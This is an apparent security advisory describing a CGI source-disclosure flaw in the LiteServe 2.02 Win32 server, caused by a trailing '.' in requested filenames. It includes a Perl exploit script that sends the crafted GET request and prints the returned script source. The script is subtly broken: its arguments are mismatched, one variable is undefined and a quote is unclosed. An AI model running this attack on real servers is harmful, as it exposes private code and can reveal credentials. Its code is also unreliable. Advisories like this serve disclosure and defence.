Christopher Fillion's "Perception" web site hosts the LiteServe combination server for Win32. The server offers HTTP, FTP, SMTP, POP3, and Telnet services. Included in the HTTP service is a Common Gateway Interface (CGI) feature that allows you to specify a CGI alias, as well as "filters" that are run when a file of a particular type is accessed. A vulnerability in the server related to the handling of filenames on Win32 platforms may reveal the code of a desired CGI script to an attacker. Windows handles file names with the "." character (0x2E) on the end as if the said character had been removed. LiteServe fails to compensate for this behavior, and is vulnerable to a simple CGI disclosure attack. The upcoming release of LiteServe 2.03 should eliminate this vulnerability. Exploit #!/usr/bin/perl # # LS_FETCH.PL # By Matthew Murphy # LiteServe 2.02 and prior - CGI Disclosure # Usage: perl ls_fetch.pl [filename] [host] [alias] [port] use IO::Socket; use URI::Escape; $alias = "cgi-isapi"; # Default LiteServe CGI alias $port = 80; if (@ARGV < 2 || @ARGV > 4) { print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80] } else { if (@ARGV >= 3) { $alias = $ARGV[2]; } if (@ARGV == 4) { $port = $ARGV[3]; } $filename = $ARGV[1]; $host = $ARGV[2]; $f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp"); $f->autoflush(1); $b = sprintf("GET /%s/%s. HTTP/1.0\r\n\r\n", $alias, uri_escape($file)); print $f $b; while (defined($line=<$f>)) { print STDOUT $line; } undef $f; } -------------------------------------------------------------------- mail2web - Check your email from the web at http://mail2web.com/ .